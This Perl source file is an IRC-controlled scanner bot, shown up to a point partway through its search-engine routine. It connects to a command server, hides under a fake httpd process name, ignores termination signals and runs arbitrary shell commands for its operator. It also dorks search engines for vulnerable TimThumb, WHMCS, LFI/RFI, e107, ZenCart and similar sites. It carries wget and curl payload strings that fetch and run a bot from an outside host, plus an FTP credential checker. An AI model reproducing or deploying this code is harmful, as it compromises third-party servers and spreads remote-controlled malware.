mltiscaner

1. #!/usr/bin/perl
2.  
3. use HTTP::Request;
4. use HTTP::Request::Common;
5. use HTTP::Request::Common qw(POST);
6. use LWP::Simple;
7. use LWP 5.64;
8. use LWP::UserAgent;
9. use Socket;
10. use IO::Socket;
11. use IO::Socket::INET;
12. use IO::Select;
13. use MIME::Base64;
14. use URI::Escape;
15. use Digest::MD5 qw(md5_hex);
16. use DBI;
17. use DBD::mysql;
18.  
19. my $datetime = localtime;
20. my $fakeproc = "/usr/sbin/httpd";
21. my $ircserver = "scan.no-ip.org";
22. my $ircport = 6667;
23. my $nickname = "ath0[".int(rand(100))."]";
24. my $ident = "Sigit";
25. my $channel = "#or";
26. my $chanxxx = "#or";
27. my $chaninfo = "#or";
28. my $submitchan = "#or";
29. my $admin = "ath0";
30. my $fullname = "[!][scanner] Multi VersioN";
31. my $rawmsg = $ARGV[4];
32. my $msgraw = $ARGV[5];
33.  
34. my $nob0dy = " [!][scanner] Multi VersioN ";
35. my $whmcslogo = " [!] WHMCS <=> ";
36. my $thumblogo = " [!] TimThumb <=> ";
37. my $zerologo = " [!] zBoarD <=> ";
38. my $lfilogo = " [!] Lfi <=> ";
39. my $rfilogo = " [!] Rfi <=> ";
40. my $xmllogo = " [!] Xml <=> ";
41. my $oscologo = " [!]Osco <=> ";
42. my $oscosqllogo = " [!] O-Sql <=> ";
43. my $e107logo = " [!] E107 <=> ";
44. my $ihlogo = " [!] Is-Human <=> ";
45. my $zenlogo = " [!] ZenCart <=> ";
46. my $rfglogo = " [!] RfG <=> ";
47. my $carilogo = " [!] Find <=> ";
48. my $whmcscmd = '.whmcs';
49. my $thumbcmd = "!tim".int(rand(10));
50. my $zerocmd = ".zero";
51. my $lficmd = ".lfi";
52. my $rficmd = ".rfi";
53. my $xmlcmd = ".xml";
54. my $e107cmd = ".e107";
55. my $zencmd = ".zenc";
56. my $ihcmd = ".ishu";
57. my $oscocmd = ".osco";
58. my $cmdlfi = ".cmdlfi";
59. my $cmdxml = ".cmdxml";
60. my $cmde107 = ".cmde107";
61. my $rfgcmd = ".rfg";
62. my $ftpcmd = ".ftp";
63. my $spreadMode = 1;
64. my $zerowget = 1;
65. my $zerolwp = 1;
66. my $zerocurl = 1;
67. my $gps = 1;
68. my $gps2 = 1;
69. my $timot = 10;
70. my $silentmode = 1;
71. my $hostinjector = "flickr.com.lmao2.com";
72. my $thumbid = "http://".$hostinjector."/bad.php";
73. my $botdid = "http://".$hostinjector."/load.php";
74. my $botxdid = "http://".$hostinjector."/xcrew.php";
75. my $thumbshell = uri_escape($thumbid);
76. my $md5php = md5_hex($thumbid).".php";
77. my $md5bot = md5_hex($botdid).".php";
78. my $md5botx = md5_hex($botxdid).".php";
79. my $botid = uri_escape($botdid);
80. my $botxid = uri_escape($botxdid);
81. my $injector = "http://".$hostinjector."/bad.txt";
82. my $botshell = "http://".$hostinjector."/bot.txt";
83. my $subticket = "/submitticket.php?step=2&deptid=1";
84. my $action = "/data/lobex.php";
85. my $wgetdon = "?cmd=wget%20http%3A%2F%2F".$hostinjector."%2Fkekkaishi.php;wget%20;perl%20botis.txt;rm%20botis.txt";
86. my $lwpdon = "?cmd=lwp-download%20-a%20http%3A%2F%2F".$hostinjector."%2Fkekkaishi.php;lwp-download%20-a%20;perl%20botis.txt;rm%20botis.txt";
87. my $curldon = "?cmd=curl%20-C%20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fkekkaishi.php;curl%20-C%20-%20-O%20;perl%20botis.txt;rm%20botis.txt";
88. my $uagent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6";
89. my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000";
90. my $jpath = "/wp-includes/error.php?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
91. my $jack1 = "http://tema1.simgta.com/lobex.php?q="; #"http://altadelisboa.com".$jpath;
92. my $jack2 = "http://tema1.simgta.com/lobex.php?q="; #"http://selectiveretreats.com".$jpath;
93. my $jack3 = "http://tema1.simgta.com/lobex.php?q="; #"http://agri-impact.com".$jpath;
94. my $jack4 = "http://tema1.simgta.com/lobex.php?q="; #"http://viewwebinars.com".$jpath;
95. my $jack5 = "http://tema1.simgta.com/lobex.php?q="; #"http://liftoffconsulting.ca".$jpath;
96. my $engine = "JacKAC,JacKAD,JacKAE,JacKAF,JacKAG,JacKAL,JacKAM,JacKAN,JacKAT,JacKAR,JacKAU,JacKBE,JacKHU,JacKOrG,JacKCoM,JacKNeT,JacKPL,JacKIT,JacKID,JacKMY,
97. JacKES,JacKUK,JacKUS,JacKJP,JacKKR,JacKDE,JacKDK,JacKCA,JacKBR,JacKRO,JacKRU,JacKNL,JacKInfO,JacKFR,JacKIN,JacKMX,JacKCZ,JacKCL,JacKUA,
98. JacKCN,JacKIR,JacKTH,JacKEU,JacKPH,JackIL,JackIM,JacKSI,JacKBIZ,GooGLe,WaLLa,YaHoo,AsK,Bing,OnEt,CLusTy,SaPo,AoL,UoL,LyCos,HotBot,BigLobe,SeZNam";
99.  
100. $SIG{'INT'} = 'IGNORE';
101. $SIG{'HUP'} = 'IGNORE';
102. $SIG{'TERM'} = 'IGNORE';
103. $SIG{'CHLD'} = 'IGNORE';
104. $SIG{'PS'} = 'IGNORE';
105. #chdir("/");
106. $ircserver = "$ARGV[0]" if $ARGV[0];
107. $ircport = "$ARGV[1]" if $ARGV[1];
108. $nickname = "$ARGV[2]" if $ARGV[2];
109. $channel = '#'."$ARGV[3]" if $ARGV[3];
110. $0 = "$fakeproc"."\0" x 16;
111. my $pid = fork;
112. exit if $pid;
113. die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);
114.  
115. our %irc_servers;
116. our %DCC;
117. my $dcc_sel = new IO::Select->new();
118. $sel_client = IO::Select->new();
119. sub sendraw {
120. if ($#_ == '1') {
121. my $socket = $_[0];
122. print $socket "$_[1]\n";
123. } else {
124. print $IRC_cur_socket "$_[0]\n";
125. }
126. }
127. sub connector {
128. my $mynick = $_[0];
129. my $ircserver_con = $_[1];
130. my $ircport_con = $_[2];
131. my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
132. if (defined($IRC_socket)) {
133. $IRC_cur_socket = $IRC_socket;
134. $IRC_socket->autoflush(1);
135. $sel_client->add($IRC_socket);
136. $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
137. $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
138. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
139. $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
140. nick("$mynick");
141. sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
142. sleep(1);}}
143.  
144. sub parse {
145. my $servarg = shift;
146. if ($servarg =~ /^PING \:(.*)/) {
147. sendraw("PONG :$1");
148. }
149. elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
150. if (lc($1) eq lc($mynick)) {
151. $mynick = $4;
152. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
153. }
154. }
155. elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
156. nick($mynick.int(rand(5)));
157. }
158. elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
159. $mynick = $2;
160. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
161. $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
162. sendraw("MODE $mynick +Bx");
163. sendraw("NS id qwe123");
164. sleep(3);
165. sendraw("JOIN $channel correct");
166. sendraw("JOIN $chanxxx mejen");
167. sleep(1);
168. sendraw("PRIVMSG $channel : EhhEemmmm !!!");
169. sendraw("PRIVMSG $admin :Hi $admin im here !!!");
170. }
171. }
172.  
173. my $line_temp;
174. while( 1 ) {
175. while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); }
176. select(undef, undef, undef, 0.01);
177. delete($irc_servers{''}) if (defined($irc_servers{''}));
178. my @ready = $sel_client->can_read(0);
179. next unless(@ready);
180. foreach $fh (@ready) {
181. $IRC_cur_socket = $fh;
182. $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
183. $nread = sysread($fh, $ircmsg, 4096);
184. if ($nread == 0) {
185. $sel_client->remove($fh);
186.  
187. $fh->close;
188. delete($irc_servers{$fh});
189. }
190. @lines = split (/\n/, $ircmsg);
191. $ircmsg =~ s/\r\n$//;
192. if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
193. my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
194. if ($path eq $mynick) {
195. if ($msg =~ /^ PING (.*) /) {
196. sendraw("NOTICE $nick : PING $1 ");
197. }
198. if ($msg =~ /^ VERSION /) {
199. sendraw("NOTICE $nick : VERSION mIRC v6.21 Khaled Mardam-Bey ");
200. }
201. if ($msg =~ /^ TIME /) {
202. sendraw("NOTICE $nick : TIME ".$datetime." ");
203. }
204. if (&isAdmin($nick) && $msg eq "!die") {
205. &shell("$path","kill -9 $$");
206. }
207. if (&isAdmin($nick) && $msg eq "!killall") {
208. &shell("$path","killall -9 perl");
209. }
210. if (&isAdmin($nick) && $msg eq "!reset") {
211. sendraw("QUIT :Restarting...");
212. }
213. if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
214. sendraw("JOIN #".$1);
215. }
216. if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
217. sendraw("PART #".$1);
218. }
219. if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
220. sendraw("NICK ".$1);
221. }
222. if (&isAdmin($nick) && $msg =~ /^!pid/) {
223. sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$");
224. }
225. if (&isAdmin($nick) && $msg !~ /^!/) {
226. &shell("$nick","$msg");
227. }
228. if (&isAdmin($nick) && $msg =~ /^!raw (.+)/) {
229. sendraw("$rawmsg $msgraw ".$1);
230. }
231. if (&isAdmin($nick) && $msg =~ /^!say (.+)/) {
232. sendraw("PRIVMSG $rawmsg ".$1);
233. }
234. if (&isAdmin($nick) && $msg =~ /^!act (.+)/) {
235. sendraw("PRIVMSG $rawmsg : ACTION ".$1." ");
236. }
237. if (&isAdmin($nick) && $msg =~ /^!chtcmd\s+(.*) -d/) {
238. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
239. $newthumbcmd = $1;
240. $thumbcmd = $newthumbcmd;
241. &msg("$admin","$thumblogo Scan Command change to $thumbcmd ");
242. }}}
243. if (&isAdmin($nick) && $msg =~ /^!chzcmd\s+(.*) -d/) {
244. $newzerocmd = $1;
245. $zerocmd = $newzerocmd;
246. &msg("$admin","$zerologo Scan Command change to $zerocmd ");
247. }
248. if (&isAdmin($nick) && $msg =~ /^!chwcmd\s+(.*) -d/) {
249. $newwhmcscmd = $1;
250. $whmcscmd = $newwhmcscmd;
251. &msg("$admin","$whmcslogo Scan Command change to $whmcscmd ");
252. }
253. if (&isAdmin($nick) && $msg =~ /^!timot\s+(.*) -d/) {
254. $newtimot = $1;
255. $timot = $newtimot;
256. &msg("$admin"," Get Content TimeOut change to $timot ");
257. }
258. if (&isAdmin($nick) && $msg =~ /^!chxchan\s+(.+) -d/) {
259. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
260. $newchan = $1;
261. $chanxxx = $newchan;
262. &msg("$admin"," xChan change to $chanxxx ");
263. }}}
264. }
265. else {
266. if (&isAdmin($nick) && $msg eq "!die") {
267. &shell("$path","kill -9 $$");
268. }
269. if (&isAdmin($nick) && $msg eq "!killall") {
270. &shell("$path","killall -9 perl");
271. }
272. if (&isAdmin($nick) && $msg eq "!reset") {
273. sendraw("QUIT :Restarting...");
274. }
275. if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
276. sendraw("JOIN #".$1);
277. }
278. if (&isAdmin($nick) && $msg eq "!part") {
279. sendraw("PART $path");
280. }
281. if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
282. sendraw("PART #".$1);
283. }
284. if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {
285. &shell("$path","$1");
286. }
287. if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
288. &shell("$path","$1");
289. }
290. if ($msg=~ /^!silent\s+(.*) -d/) {
291. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
292. $smod = $1;
293. if ($smod =~ /ON/) { $silentmode = 1; $silentstat = "ON"; }
294. elsif ($smod =~ /OFF/) { $silentmode = 0; $silentstat = "OFF"; }
295. &msg("$path"," [!]Silent Mode $silentstat !!!!");
296. }}}
297. if ($msg=~ /^!jackx\s+(.*) -d/) {
298. $engmod = $1;
299. if ($engmod =~ /ON/) { $gps = 1; $gpsstat = "ACTIVATED"; }
300.  
301. elsif ($engmod =~ /OFF/) { $gps = 0; $gpsstat = "DEACTIVATED"; }
302. &msg("$path","[!]Jack Engine $gpsstat !!!!");
303. }
304. if ($msg=~ /^!engine\s+(.*) -d/) {
305. $engmod = $1;
306. if ($engmod =~ /ON/) { $gps2 = 1; $gpsstat = "ACTIVATED"; }
307. elsif ($engmod =~ /OFF/) { $gps2 = 0; $gpsstat = "DEACTIVATED"; }
308. &msg("$path","[!]Multi Engine $gpsstat !!!!");
309. }
310. if (&isAdmin($nick) && $msg =~ /^!injector\s+(.*) -d/) {
311. $newhostinjector= $1;
312. $hostinjector = $newhostinjector;
313. &msg("$path"," [ !]Injector change to $hostinjector ");
314. }
315. if ($msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){
316. my $url = $1.$lfdtest;
317. my $cmd = $2;
318. &cmdlfi($url,$cmd,$path);
319. }
320. if ($msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){
321. my $url = $1;
322. my $cmd = $2;
323. &cmdxml($url,$cmd,$path);
324. }
325. if ($msg=~ /^$cmde107\s+(.*?)\s+(.*)/){
326. my $url = $1;
327. my $cmd = $2;
328. &cmde107($url,$cmd,$path);
329. }
330. ##################################################################### HELP COMMAND
331. if ($msg=~ /^!help/) {
332. my $helplogo = " [!]Help <=> ";sleep(3);
333. &msg("$path","$helplogo Timthumb Vuln Scan: $thumbcmd [bug] [dork] ");
334. &msg("$path","$helplogo RFG Vuln Scan: $rfgcmd [bug] [dork] ");
335. &msg("$path","$helplogo RFI Vuln Scan: $rficmd [bug] [dork] ");
336. &msg("$path","$helplogo LFI Vuln Scan: $lficmd [bug] [dork] ");
337. &msg("$path","$helplogo XML Vuln Scan: $xmlcmd [bug] [dork] ");
338. &msg("$path","$helplogo e107 Vuln Scan: $e107cmd [dork] ");
339. &msg("$path","$helplogo WHMCS Vuln Scan: $whmcscmd [dork] ");
340. &msg("$path","$helplogo ZeroBoard Vuln Scan: $zerocmd [dork] ");
341. &msg("$path","$helplogo osCommerce Vuln Scan: $oscocmd [dork] ");
342. &msg("$path","$helplogo ZenCart Vuln Scan: $zencmd [dork] ");
343. }
344. if (&isAdmin($nick) && $msg =~ /^!pid/) {
345. &msg("$nick"," 6Fake Process/PID : $fakeproc - $$");
346. }
347. if ($msg=~ /^!respon/ || $msg=~ /^!id/) {
348. if (&isFound($thumbid,"GIF89")) {
349. &msg("$path"," [!]Injector <=> Ready!!! ");
350. } else {
351. &msg("$path"," [!]Injector <=> Lost!!! ");
352. }
353. }
354. if ($msg=~/^!bypass/){
355. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
356. my $bystats1 = "";my $bystats2 = "";my $bystats3 = "";my $bystats4 = "";my $bystats5 = "";
357. my $cekby1 = &get_content($jack1."byroe");
358. if ($cekby1 =~ /byroe\.net/i){ $bystats1 = " Up!!!"; } else { $bystats1 = " Lost!!!"; }
359. my $cekby2 = &get_content($jack2."byroe");
360. if ($cekby2 =~ /byroe\.net/i){ $bystats2 = " Up!!!"; } else { $bystats2 = " Lost!!!"; }
361. my $cekby3 = &get_content($jack3."byroe");
362. if ($cekby3 =~ /byroe\.net/i){ $bystats3 = " Up!!!"; } else { $bystats3 = " Lost!!!"; }
363. my $cekby4 = &get_content($jack4."byroe");
364. if ($cekby4 =~ /byroe\.net/i){ $bystats4 = " Up!!!"; } else { $bystats4 = " Lost!!!"; }
365. my $cekby5 = &get_content($jack5."byroe");
366. if ($cekby5 =~ /byroe\.net/i){ $bystats5 = " Up!!!"; } else { $bystats5 = " Lost!!!"; }
367. &msg("$path","[!]Bypass <=> JacK1=$bystats1 JacK2=$bystats2 JacK3=$bystats3 JacK4=$bystats4 15JacK5=$bystats5 ")
368. }}}
369. ##################################################################### SCAN
370. if ($msg =~ /!cari\s+(.*)/) {
371. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
372. my $find = $1;
373. &msg($path,"$carilogo Searching $find ");
374. &cari($path,$find);
375. } exit; }
376. }
377. if ($msg =~ /^$oscocmd\s+(.*)/) {
378. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
379. my $dork = $1;
380. my $simpan = 'situs.txt';
381. if (&isFound($thumbid,"GIF89")) {
382. &msg("$chanxxx","[!] Lapor <=> $nick lagi scan Oscommerce di $path ");
383. &msg("$path","$oscologo Dork <=> $dork ");
384. &msg("$path","$oscologo Search Engine <=> Loading ");
385. &se_start($path,"apalah",$simpan,$dork,$engine,9);
386. } else {
387. &msg("$path","[!]Injector <=> Lost!!! "); exit;
388. }
389. }
390. }
391. }
392. if ($msg =~ /^$lficmd\s+(.+?)\s+(.*)/) {
393. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
394. my ($bug,$dork) = ($1,$2);
395. my $simpan = 'situs.txt';
396. if (&isFound($thumbid,"GIF89")) {
397. &msg("$chanxxx","[!] Lapor <=> $nick lagi scan LFI di $path ");
398. &msg("$path","$lfilogo Dork <=> $dork ");
399. &msg("$path","$lfilogo Bugz <=> $bug ");
400. &msg("$path","$lfilogo Search Engine <=> Loading ");
401. &se_start($path,$bug,$simpan,$dork,$engine,3);
402. } else {
403. &msg("$path","[!]Injector <=> Lost!!! "); exit;
404. }
405. }
406. }
407. }
408. if ($msg =~ /^$rficmd\s+(.+?)\s+(.*)/) {
409. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
410. my ($bug,$dork) = ($1,$2);
411. my $simpan = 'situs.txt';
412. if (&isFound($thumbid,"GIF89")) {
413. &msg("$chanxxx"," [!] Lapor <=> $nick lagi scan RFI di $path ");
414. &msg("$path","$rfilogo Dork <=> $dork ");
415. &msg("$path","$rfilogo Bugz <=> $bug ");
416. &msg("$path","$rfilogo Search Engine <=> Loading ");
417. &se_start($path,$bug,$simpan,$dork,$engine,5);
418. } else {
419. &msg("$path","[!]Injector <=> Lost!!! "); exit;
420. }
421. }
422. }
423. }
424. if ($msg =~ /^$xmlcmd\s+(.+?)\s+(.*)/) {
425. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
426. my ($bug,$dork) = ($1,$2);
427. my $simpan = 'situs.txt';
428. &msg("$chanxxx","[!] Lapor <=> $nick lagi scan XML di $path ");
429. &msg("$path","$xmllogo Dork <=> $dork ");
430. &msg("$path","$xmllogo Bugz <=> $bug ");
431. &msg("$path","$xmllogo Search Engine <=> Loading ");
432. &se_start($path,$bug,$simpan,$dork,$engine,6);
433. }
434. }
435. }
436. if ($msg =~ /^$thumbcmd\s+(.+?[.php])\s+(.*)/) {
437. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
438. my ($bug,$dork) = ($1,$2);
439. my $simpan = 'situs.txt';
440. if ($bug =~ m/^\//){ &msg("$path","[!]Burro tira a barra \/ do comeco :p "); exit; } else {
441. if (&isFound($thumbid,"GIF89")) {
442. &msg("$chanxxx","[!]Lapor <=> $nick lagi scan TimTHumb di $path ");
443. &msg("$path","$thumblogo Dork <=> $dork ");
444. &msg("$path","$thumblogo Bugz <=> $bug ");
445. &msg("$path","$thumblogo Search Engine <=> Loading ");
446. &se_start($path,$bug,$simpan,$dork,$engine,1);
447. } else {
448. &msg("$path","[!]Injector <=> Lost!!! "); exit; }
449. }
450. }
451. }
452. }
453. if ($msg =~ /^$whmcscmd\s+(.*)/) {
454. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
455. my ($bug,$dork) = ("cart.php?a=byroe&templatefile=",$1);
456. my $simpan = 'situs.txt';
457. &msg("$chanxxx","[!] Lapor <=> $nick lagi scan WHMCS di $path ");
458. &msg("$path","$whmcslogo Dork <=> $dork ");
459. &msg("$path","$whmcslogo Search Engine <=> Loading ");
460. &se_start($path,$bug,$simpan,$dork,$engine,2);
461. }
462. }
463. }
464. if ($msg =~ /^$zerocmd\s+(.*)/) {
465. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
466. if (&isFound($thumbid,"GIF89")) {
467. my ($bug,$dork) = ("zboard.php?id=byroe",$1);
468. my $simpan = 'situs.txt';
469. &msg("$chanxxx","[!] Lapor <=> $nick lagi scan zboard di $path ");
470. &msg("$path","$zerologo Dork <=> $dork ");
471. &msg("$path","$zerologo Search Engine <=> Loading ");
472. &se_start($path,$bug,$simpan,$dork,$engine,4);
473. } else {
474. &msg("$path","[!]Injector <=> Lost!!! ");
475. }
476. }
477. }
478. }
479. if ($msg =~ /^$e107cmd\s+(.*)/) {
480. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
481. if (&isFound($thumbid,"GIF89")) {
482. my ($bug,$dork) = ("contact.php",$1);
483. my $simpan = 'situs.txt';
484. &msg("$chanxxx","[!] Lapor <=> $nick lagi scan E107 di $path ");
485. &msg("$path","$e107logo Dork <=> $dork ");
486. &msg("$path","$e107logo Search Engine <=> Loading ");
487. &se_start($path,$bug,$simpan,$dork,$engine,7);
488. } else {
489. &msg("$path","[!]Injector <=> Lost!!! ");
490. }
491. }
492. }
493. }
494. if ($msg =~ /^$ihcmd\s+(.*)/) {
495. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
496. if (&isFound($thumbid,"GIF89")) {
497. my ($bug,$dork) = ("wp-content/plugins/is-human/engine.php",$1);
498. my $simpan = 'situs.txt';
499. &msg("$chanxxx","[!] Lapor <=> $nick lagi scan Is-Human di $path ");
500. &msg("$path","$ihlogo Dork <=> $dork ");
501. &msg("$path","$ihlogo Search Engine <=> Loading ");
502. &se_start($path,$bug,$simpan,$dork,$engine,8);
503. } else {
504. &msg("$path","[!]Injector <=> Lost!!! ");
505. }
506. }
507. }
508. }
509. if ($msg =~ /^$zencmd\s+(.*)/) {
510. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
511. my ($bug,$dork) = ("admin/sqlpatch.php/password_forgotten.php?action=execute",$1);
512. my $simpan = 'situs.txt';
513. &msg("$chanxxx","[!] Lapor <=> $nick lagi scan ZenCart di $path ");
514. &msg("$path","$zenlogo Dork <=> $dork ");
515. &msg("$path","$zenlogo Search Engine <=> Loading ");
516. &se_start($path,$bug,$simpan,$dork,$engine,10);
517. }
518. }
519. }
520. if ($msg =~ /^$rfgcmd\s+(.*)/) {
521. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
522. my ($bug,$dork) = ("apalah",$1);
523. my $simpan = 'situs.txt';
524. &msg("$chanxxx","[!] Lapor <=> $nick lagi scan RFG di $path ");
525. &msg("$path","$rfglogo Dork <=> $dork ");
526. &msg("$path","$rfglogo Search Engine <=> Loading ");
527. &se_start($path,$bug,$simpan,$dork,$engine,11);
528. }
529. }
530. }
531. if ($msg =~ /^$ftpcmd\s+(.+?)\s+(.*)\s+(.*)/) {
532. my $url = $_[0];
533. my $host = $_[1];
534. my $user = $_[2];
535. my $pass = $_[3];
536. if (my $pid = fork) {
537. waitpid($pid, 0);
538. } else {
539. if (fork) { exit; } else {
540. my ($host,$user,$pass) = ($1,$2,$3);
541. &msg("$path","[!]FTP <=> Checking $host | $user:$pass");
542. my $success = 1;
543. use Net::FTP;
544. my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 5);
545. $success = 0 if $ftp->login($user,$pass);
546. $ftp->quit;
547. if ($success == 0) {
548. &notice("$nick","[FTP] [http://".$host."] [".$user.":".$pass."] Success ");
549. } else {
550. &notice("$nick","[FTP] [http://".$host."] [".$user.":".$pass."] Denied ");
551.  
552. }
553. }
554. }
555. }
556. }
557. }
558. for(my $c=0; $c<= $#lines; $c++) {
559. $line = $lines[$c];
560. $line = $line_temp.$line if ($line_temp);
561. $line_temp = '';
562. $line =~ s/\r$//;
563. unless ($c == $#lines) {
564.  
565. parse("$line");
566. } else {
567. if ($#lines == 0) {
568. parse("$line");
569. } elsif ($lines[$c] =~ /\r$/) {
570. parse("$line");
571. } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
572. parse("$line");
573. } else {
574. $line_temp = $line;
575. }
576. }
577. }
578. }
579. }
580.  
581. ##################################################################################
582.  
583. sub lobex() {
584. my $dork = $_[0];
585. my @targets;
586. for (my $st=0; $st<=1000 ; $st+=100){
587. my $engine = "http://www.google.com/search?q=".uri_escape($dork)."&num=100&start=".$st;
588. my $browser = &search_engine_query($engine);
589. while ($browser =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
590. my $target = $1;
591. if ($target !~ /google|forum|stackoverflow|php\.net/) {
592. my @sort = split(/\.php/,$target);
593. push (@targets,$sort[0]);
594. }
595. }
596. }
597. return @targets;
598. }
599.  
600. sub cari() {
601. my $chan = $_[0];
602. my $dork = $_[1];
603. my $count = 0;
604. my @kotor = &lobex($dork);
605. my @target = &clean(@kotor);
606. my $num = scalar(@target); &msg($chan,"$carilogo Total [$num] sites");
607. if ($num > 0) {
608. foreach my $site(@target) {
609. $count++;
610. if ($count == $num-1) {
611. &msg("$chan","$carilogo Finished for $dork ");
612. }
613. my $test = "http://".$site.".php?src=".$thumbshell;
614. if (my $pid = fork) { waitpid($pid, 0); } else {
615. if (fork) { exit; } else {
616. my $coba = &get_content($test);
617. if ($coba =~ /Unable to open image/) {
618. &msg($chan,"$carilogo VulN -> http://".$site.".php ");
619. }
620. } exit;
621. }
622. }
623. }
624. }
625.  
626. sub type() {
627. my ($chan,$bug,$simpan,$dork,$engine,$type) = @_;
628. if ($type == 1){$type=&thumb_exploit($chan,$bug,$simpan,$dork,$engine);}
629. elsif ($type == 2){$type=&whmcs_exploit($chan,$bug,$simpan,$dork,$engine);}
630. elsif ($type == 3){$type=&lfi_exploit($chan,$bug,$simpan,$dork,$engine);}
631. elsif ($type == 4){$type=&zero_exploit($chan,$bug,$simpan,$dork,$engine);}
632. elsif ($type == 5){$type=&rfi_exploit($chan,$bug,$simpan,$dork,$engine);}
633. elsif ($type == 6){$type=&xml_exploit($chan,$bug,$simpan,$dork,$engine);}
634. elsif ($type == 7){$type=&e107_exploit($chan,$bug,$simpan,$dork,$engine);}
635. elsif ($type == 8){$type=&ih_exploit($chan,$bug,$simpan,$dork,$engine);}
636. elsif ($type == 9){$type=&osco_exploit($chan,$bug,$simpan,$dork,$engine);}
637. elsif ($type == 10){$type=&zen_exploit($chan,$bug,$simpan,$dork,$engine);}
638. elsif ($type == 11){$type=&rfg_exploit($chan,$bug,$simpan,$dork,$engine);}
639. }
640.  
641. ##################################################################################
642.  
643. sub se_start() {
644. my ($chan,$bug,$simpan,$dork,$engine,$type) = @_;
645. if ($gps ==1) {
646. if ($engine =~ /jackae/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAE",$type); } exit; } }
647. if ($engine =~ /jackar/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAR",$type); } exit; } }
648. if ($engine =~ /jackat/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAT",$type); } exit; } }
649. if ($engine =~ /jackau/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAU",$type); } exit; } }
650. if ($engine =~ /jackbr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKBR",$type); } exit; } }
651. if ($engine =~ /jackca/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCA",$type); } exit; } }
652. if ($engine =~ /jackcl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCL",$type); } exit; } }
653. if ($engine =~ /jackcn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCN",$type); } exit; } }
654. if ($engine =~ /jackcom/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCoM",$type); } exit; } }
655. if ($engine =~ /jackcz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCZ",$type); } exit; } }
656. if ($engine =~ /jackde/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKDE",$type); } exit; } }
